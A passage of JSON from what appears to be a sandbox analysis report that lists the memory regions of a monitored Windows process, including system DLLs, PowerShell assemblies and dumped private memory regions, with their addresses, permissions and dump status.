"name": "cscapi.dll", "norm_filename": "c:\\windows\\system32\\cscapi.dll", "region_type": "memory_mapped_file", "start_va": 8791659577344, "timestamp": "00:01:09.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 8791682449408, "type": "region", "version": 1 }, "end_va": 8791682805759, "entry_point": 8791682453784, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1660", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 8791682449408, "timestamp": "00:01:09.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 352256, "start_va": 8791719804928, "type": "region", "version": 1 }, "end_va": 8791720157183, "entry_point": 8791719852992, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_1661", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 8791719804928, "timestamp": "00:01:09.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791729766400, "type": "region", "version": 1 }, "end_va": 8791729811455, "entry_point": 8791729786764, "filename": "\\Windows\\System32\\slc.dll", "id": "region_1662", "name": "slc.dll", "norm_filename": "c:\\windows\\system32\\slc.dll", "region_type": "memory_mapped_file", "start_va": 8791729766400, "timestamp": "00:01:09.227", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2048000, "start_va": 8791731339264, "type": "region", "version": 1 }, "end_va": 8791733387263, "entry_point": 8791732963620, "filename": "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "id": "region_1663", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 8791731339264, "timestamp": "00:01:09.228", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1228800, "start_va": 8791736057856, "type": "region", "version": 1 }, "end_va": 8791737286655, "entry_point": 8791736095932, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_1664", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 8791736057856, "timestamp": "00:01:09.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 184320, "start_va": 8791738548224, "type": "region", "version": 1 }, "end_va": 8791738732543, "entry_point": 8791738552336, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1665", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 8791738548224, "timestamp": "00:01:09.229", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 122880, "start_va": 8791742414848, "type": "region", "version": 1 }, "end_va": 8791742537727, "entry_point": 8791742419896, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1666", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 8791742414848, "timestamp": "00:01:09.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791753228288, "type": "region", "version": 1 }, "end_va": 8791753371647, "entry_point": 8791753232792, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_1667", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791753228288, "timestamp": "00:01:09.230", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 8791755390976, "type": "region", "version": 1 }, "end_va": 8791755452415, "entry_point": 8791755397552, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1668", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 8791755390976, "timestamp": "00:01:09.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 106496, "start_va": 8791757881344, "type": "region", "version": 1 }, "end_va": 8791757987839, "entry_point": 8791757886808, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_1669", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 8791757881344, "timestamp": "00:01:09.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 221184, "start_va": 8791758471168, "type": "region", "version": 1 }, "end_va": 8791758692351, "entry_point": 8791758476404, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_1670", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 8791758471168, "timestamp": "00:01:09.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1929216, "start_va": 8791759716352, "type": "region", "version": 1 }, "end_va": 8791761645567, "entry_point": 8791759720464, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_1671", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 8791759716352, "timestamp": "00:01:09.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791770071040, "type": "region", "version": 1 }, "end_va": 8791770697727, "entry_point": 8791770078224, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1672", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 8791770071040, "timestamp": "00:01:09.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 335872, "start_va": 8791772823552, "type": "region", "version": 1 }, "end_va": 8791773159423, "entry_point": 8791772827860, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1673", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 8791772823552, "timestamp": "00:01:09.236", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 14188544, "start_va": 8791773216768, "type": "region", "version": 1 }, "end_va": 8791787405311, "entry_point": 8791773728444, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_1674", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 8791773216768, "timestamp": "00:01:09.237", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001675-addr_0x000007fffffd5000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_290", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092846080, "type": "region", "version": 1 }, "end_va": 8796092854271, "entry_point": 0, "filename": null, "id": "region_1675", "name": "private_0x000007fffffd5000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092846080, "timestamp": "00:01:09.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001676-addr_0x000007fffffd7000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_291", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092854272, "type": "region", "version": 1 }, "end_va": 8796092862463, "entry_point": 0, "filename": null, "id": "region_1676", "name": "private_0x000007fffffd7000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092854272, "timestamp": "00:01:09.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001677-addr_0x000007fffffd9000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_292", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092862464, "type": "region", "version": 1 }, "end_va": 8796092870655, "entry_point": 0, "filename": null, "id": "region_1677", "name": "private_0x000007fffffd9000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092862464, "timestamp": "00:01:09.238", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001678-addr_0x000007fffffdb000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_293", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092870656, "type": "region", "version": 1 }, "end_va": 8796092878847, "entry_point": 0, "filename": null, "id": "region_1678", "name": "private_0x000007fffffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092870656, "timestamp": "00:01:09.239", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 626688, "start_va": 8791550525440, "type": "region", "version": 1 }, "end_va": 8791551152127, "entry_point": 8791550535280, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscoreei.dll", "id": "region_1679", "name": "mscoreei.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v4.0.30319\\mscoreei.dll", "region_type": "memory_mapped_file", "start_va": 8791550525440, "timestamp": "00:01:09.275", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 290816, "start_va": 8791744839680, "type": "region", "version": 1 }, "end_va": 8791745130495, "entry_point": 8791744843876, "filename": "\\Windows\\System32\\rsaenh.dll", "id": "region_1680", "name": "rsaenh.dll", "norm_filename": "c:\\windows\\system32\\rsaenh.dll", "region_type": "memory_mapped_file", "start_va": 8791744839680, "timestamp": "00:01:09.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 8791747985408, "type": "region", "version": 1 }, "end_va": 8791748079615, "entry_point": 8791747998392, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1681", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 8791747985408, "timestamp": "00:01:09.277", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 32440320, "type": "region", "version": 1 }, "end_va": 32444415, "entry_point": 0, "filename": null, "id": "region_1682", "name": "pagefile_0x0000000001ef0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32440320, "timestamp": "00:01:09.292", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001683-addr_0x0000000001fe0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_294", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33423360, "type": "region", "version": 1 }, "end_va": 33488895, "entry_point": 0, "filename": null, "id": "region_1683", "name": "private_0x0000000001fe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33423360, "timestamp": "00:01:09.293", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001684-addr_0x0000000002760000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_295", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 41287680, "type": "region", "version": 1 }, "end_va": 42336255, "entry_point": 0, "filename": null, "id": "region_1684", "name": "private_0x0000000002760000", "norm_filename": null, "region_type": "private_memory", "start_va": 41287680, "timestamp": "00:01:09.293", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001685-addr_0x0000000002b50000-size_0x0000000000080000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_296", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 45416448, "type": "region", "version": 1 }, "end_va": 45940735, "entry_point": 0, "filename": null, "id": "region_1685", "name": "private_0x0000000002b50000", "norm_filename": null, "region_type": "private_memory", "start_va": 45416448, "timestamp": "00:01:09.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 823296, "start_va": 1966473216, "type": "region", "version": 1 }, "end_va": 1967296511, "entry_point": 1966484976, "filename": "\\Windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "id": "region_1686", "name": "msvcr80.dll", "norm_filename": "c:\\windows\\winsxs\\amd64_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6195_none_88e41e092fab0294\\msvcr80.dll", "region_type": "memory_mapped_file", "start_va": 1966473216, "timestamp": "00:01:09.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10080256, "start_va": 8791320756224, "type": "region", "version": 1 }, "end_va": 8791330836479, "entry_point": 8791325254400, "filename": "\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorwks.dll", "id": "region_1687", "name": "mscorwks.dll", "norm_filename": "c:\\windows\\microsoft.net\\framework64\\v2.0.50727\\mscorwks.dll", "region_type": "memory_mapped_file", "start_va": 8791320756224, "timestamp": "00:01:09.295", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_1688", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:09.296", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 32505856, "type": "region", "version": 1 }, "end_va": 32518143, "entry_point": 0, "filename": null, "id": "region_1689", "name": "pagefile_0x0000000001f00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 32505856, "timestamp": "00:01:09.598", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 33099775, "entry_point": 0, "filename": null, "id": "region_1690", "name": "pagefile_0x0000000001f90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 33095680, "timestamp": "00:01:09.598", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001691-addr_0x0000000001fa0000-size_0x0000000000020000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_297", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 33161216, "type": "region", "version": 1 }, "end_va": 33292287, "entry_point": 0, "filename": null, "id": "region_1691", "name": "private_0x0000000001fa0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33161216, "timestamp": "00:01:09.598", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001692-addr_0x0000000002a40000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_298", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 44302336, "type": "region", "version": 1 }, "end_va": 44826623, "entry_point": 0, "filename": null, "id": "region_1692", "name": "private_0x0000000002a40000", "norm_filename": null, "region_type": "private_memory", "start_va": 44302336, "timestamp": "00:01:09.599", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 402653184, "start_va": 45940736, "type": "region", "version": 1 }, "end_va": 448593919, "entry_point": 0, "filename": null, "id": "region_1693", "name": "private_0x0000000002bd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 45940736, "timestamp": "00:01:09.609", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001694-addr_0x000000001abd0000-size_0x00000000006d0000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_299", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 7143424, "start_va": 448593920, "type": "region", "version": 1 }, "end_va": 455737343, "entry_point": 0, "filename": null, "id": "region_1694", "name": "private_0x000000001abd0000", "norm_filename": null, "region_type": "private_memory", "start_va": 448593920, "timestamp": "00:01:09.609", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001695-addr_0x000000001b2a0000-size_0x0000000000101000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_300", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1052672, "start_va": 455737344, "type": "region", "version": 1 }, "end_va": 456790015, "entry_point": 0, "filename": null, "id": "region_1695", "name": "private_0x000000001b2a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 455737344, "timestamp": "00:01:09.609", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001696-addr_0x000000001b490000-size_0x0000000000080000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_301", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 457768960, "type": "region", "version": 1 }, "end_va": 458293247, "entry_point": 0, "filename": null, "id": "region_1696", "name": "private_0x000000001b490000", "norm_filename": null, "region_type": "private_memory", "start_va": 457768960, "timestamp": "00:01:09.610", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 15581184, "start_va": 8791305158656, "type": "region", "version": 1 }, "end_va": 8791320739839, "entry_point": 8791305158656, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "id": "region_1697", "name": "mscorlib.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\mscorlib\\9469491f37d9c35b596968b206615309\\mscorlib.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791305158656, "timestamp": "00:01:09.610", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001698-addr_0x000007ff00020000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_302", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798185984, "type": "region", "version": 1 }, "end_va": 8791798251519, "entry_point": 0, "filename": null, "id": "region_1698", "name": "private_0x000007ff00020000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798185984, "timestamp": "00:01:09.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001699-addr_0x000007ff00030000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_303", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798251520, "type": "region", "version": 1 }, "end_va": 8791798317055, "entry_point": 0, "filename": null, "id": "region_1699", "name": "private_0x000007ff00030000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798251520, "timestamp": "00:01:09.611", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001700-addr_0x000007ff00040000-size_0x00000000000a0000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_304", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 655360, "start_va": 8791798317056, "type": "region", "version": 1 }, "end_va": 8791798972415, "entry_point": 0, "filename": null, "id": "region_1700", "name": "private_0x000007ff00040000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798317056, "timestamp": "00:01:09.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001701-addr_0x000007ff000e0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_305", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791798972416, "type": "region", "version": 1 }, "end_va": 8791799037951, "entry_point": 0, "filename": null, "id": "region_1701", "name": "private_0x000007ff000e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791798972416, "timestamp": "00:01:09.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001702-addr_0x000007ff000f0000-size_0x0000000000070000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_306", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 458752, "start_va": 8791799037952, "type": "region", "version": 1 }, "end_va": 8791799496703, "entry_point": 0, "filename": null, "id": "region_1702", "name": "private_0x000007ff000f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799037952, "timestamp": "00:01:09.612", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001703-addr_0x000007fffffae000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_307", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092686336, "type": "region", "version": 1 }, "end_va": 8796092694527, "entry_point": 0, "filename": null, "id": "region_1703", "name": "private_0x000007fffffae000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092686336, "timestamp": "00:01:09.613", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001704-addr_0x000007fffffd3000-size_0x0000000000002000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_308", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 8192, "start_va": 8796092837888, "type": "region", "version": 1 }, "end_va": 8796092846079, "entry_point": 0, "filename": null, "id": "region_1704", "name": "private_0x000007fffffd3000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092837888, "timestamp": "00:01:09.613", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001718-addr_0x0000000001fc0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_316", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 33292288, "type": "region", "version": 1 }, "end_va": 33357823, "entry_point": 0, "filename": null, "id": "region_1718", "name": "private_0x0000000001fc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 33292288, "timestamp": "00:01:11.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 3022848, "start_va": 458293248, "type": "region", "version": 1 }, "end_va": 461316095, "entry_point": 460975134, "filename": "\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", "id": "region_1719", "name": "system.management.automation.dll", "norm_filename": "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll", "region_type": "memory_mapped_file", "start_va": 458293248, "timestamp": "00:01:11.207", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 729088, "start_va": 8791263477760, "type": "region", "version": 1 }, "end_va": 8791264206847, "entry_point": 8791263477760, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\Microsoft.PowerShel#\\b023321bc53c20c10ccbbd8f78c82c82\\Microsoft.PowerShell.ConsoleHost.ni.dll", "id": "region_1720", "name": "microsoft.powershell.consolehost.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\microsoft.powershel#\\b023321bc53c20c10ccbbd8f78c82c82\\microsoft.powershell.consolehost.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791263477760, "timestamp": "00:01:11.208", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 10629120, "start_va": 8791294476288, "type": "region", "version": 1 }, "end_va": 8791305105407, "entry_point": 8791294476288, "filename": "\\Windows\\assembly\\NativeImages_v2.0.50727_64\\System\\adff7dd9fe8e541775c46b6363401b22\\System.ni.dll", "id": "region_1721", "name": "system.ni.dll", "norm_filename": "c:\\windows\\assembly\\nativeimages_v2.0.50727_64\\system\\adff7dd9fe8e541775c46b6363401b22\\system.ni.dll", "region_type": "memory_mapped_file", "start_va": 8791294476288, "timestamp": "00:01:11.208", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001722-addr_0x000007ff00160000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_317", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799496704, "type": "region", "version": 1 }, "end_va": 8791799562239, "entry_point": 0, "filename": null, "id": "region_1722", "name": "private_0x000007ff00160000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799496704, "timestamp": "00:01:11.209", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001723-addr_0x000007fffff00000-size_0x0000000000010000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_318", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8796091973632, "type": "region", "version": 1 }, "end_va": 8796092039167, "entry_point": 0, "filename": null, "id": "region_1723", "name": "private_0x000007fffff00000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796091973632, "timestamp": "00:01:11.209", "type": "region", "version": 1 }, { "dump": { "filename": 